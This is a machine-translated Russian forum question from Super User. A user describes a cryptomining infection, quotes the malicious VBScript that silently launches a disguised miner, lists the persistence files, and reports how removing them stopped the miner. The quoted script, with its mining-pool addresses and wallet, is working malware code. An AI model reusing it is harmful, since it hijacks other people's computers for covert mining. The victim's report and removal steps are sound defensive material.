Мой компьютер заражен вирусом майнинга и выдает ошибку хоста скрипта Windows

326
Hamza Anis

Первой ошибкой, которую я получил, была ошибка Windows Script Host, описанная как C: \ Windows \ xdgaudio.vbs

Когда я нашел файл, содержимое было

Dim WShell Set WShell = CreateObject("WScript.Shell") WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -p x -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x", 0 Set WShell = Nothing 

Увидев это и обнаружив сервер майнинга в строке 3, я узнал, что я стал жертвой какого-то вируса, а это какой-то вирус майнинга.

Шаги, которые я предпринял, чтобы решить эту проблему.

  1. Сделал глубокое сканирование Windows защитника (ничего не получил)
  2. Сделал сканирование с использованием Anti-Rootkit (ничего не получил)
  3. Прокомментировал все сценарии VBS xdgaudio.vbs, чтобы он не выполнялся.
  4. Перейдя к файлу wmipvrse.exe, расположенному по адресу C: \ Windows \ System32 \ wbem, и обнаружил, что это служба Windows. Я не удалил ее, а переименовал в другое, после вступления во владение, чтобы он не запустился снова.

После выполнения вышеуказанных шагов ошибки исчезли

ИДК, что за сколько времени я был заражен этим вирусом и как он попал на мой компьютер.

Мой вопрос к сообществу - сообщить мне, спасен ли я от этого вируса, и какие дальнейшие шаги я должен сделать, чтобы полностью удалить этот и другие вирусы, подобные этому, и как узнать, существуют ли другие вирусы, подобные этому?

Если вам нужны какие-либо другие детали, вы можете спросить в комментариях.

Спасибо.

Ошибка сценария, которая была сначала отображена, была этой.

Мой компьютер заражен вирусом майнинга и выдает ошибку хоста скрипта Windows

ОБНОВИТЬ:

Догадаться!! Краткий ответ: удалите файл «servicecrsssr.vbs» из своего каталога Windows, затем перезагрузите компьютер. (Я на самом деле вытащил PLUG, несмотря на опасность потери / повреждения файла, чтобы исключить возможность попытки программы перезаписать какие-либо поврежденные файлы во время завершения работы.)

Вовлечен ряд других файлов, но после удаления (или переименования) указанного выше файла и перезагрузки все прошло хорошо ... никаких признаков запуска процесса добычи. Я подхватил этот вирус на двух моих тестовых компьютерах. Это были единственные компьютеры, к которым я подключил зараженный диск моего клиента через USB. Это все еще загадка, как именно эта вещь распространяется! Другие файлы, которые, казалось, были вовлечены:

\Windows\winprs.bat \Windows\winvpr.vbs \Windows\winvprse.bat \Windows\xdgaudio.vbs \Windows\Prefetch\WMIPVRSE.exe-xxxxxxxx.pf 

Файл * .pf перезаписывается с новыми случайными символами вместо «x», если вы переименовываете или удаляете его и перезагружаетесь - без какого-либо вредного воздействия, которое я могу определить. На моей первой зараженной машине я переименовал ВСЕ файлы выше, перезагружаясь после переименования каждого из них. Последний файл, который я пробовал, был "servicecrsssr.vbs". На втором зараженном тестовом компьютере я только переименовал файл "servicecrsssr.vbs" и перезагрузил компьютер, тогда все было хорошо. Пожалуйста, дайте мне знать, как это работает для вас. Спасибо!

Отдельное спасибо ответу LREmery

0
Если вы ДЕЙСТВИТЕЛЬНО беспокоитесь, отформатируйте диск и (пере) установите Windows заново. Ƭᴇcʜιᴇ007 6 лет назад 0
В дублированном вопросе не упоминается вирусная атака майнинга. Также не могу отформатировать диски. Hamza Anis 6 лет назад 0
@ Ƭᴇcʜιᴇ007 Как это дублировать с [Как я могу удалить вредоносные шпионские программы, вредоносное ПО, рекламное ПО, вирусы, трояны или руткиты с моего компьютера?] (Https://superuser.com/questions/100360/how-can-i-remove -malicious-шпионского-Malware-рекламные-вирусы-трояны или руткиты) Hamza Anis 6 лет назад 0
В нем не упоминается этот конкретный вирус, но в нем содержатся практически все общие советы, которые мы можем дать относительно того, что вы можете сделать. Процедуры для любой конкретной вирусной вспышки, как правило, очень похожи. Mokubai 6 лет назад 1

0 ответов на вопрос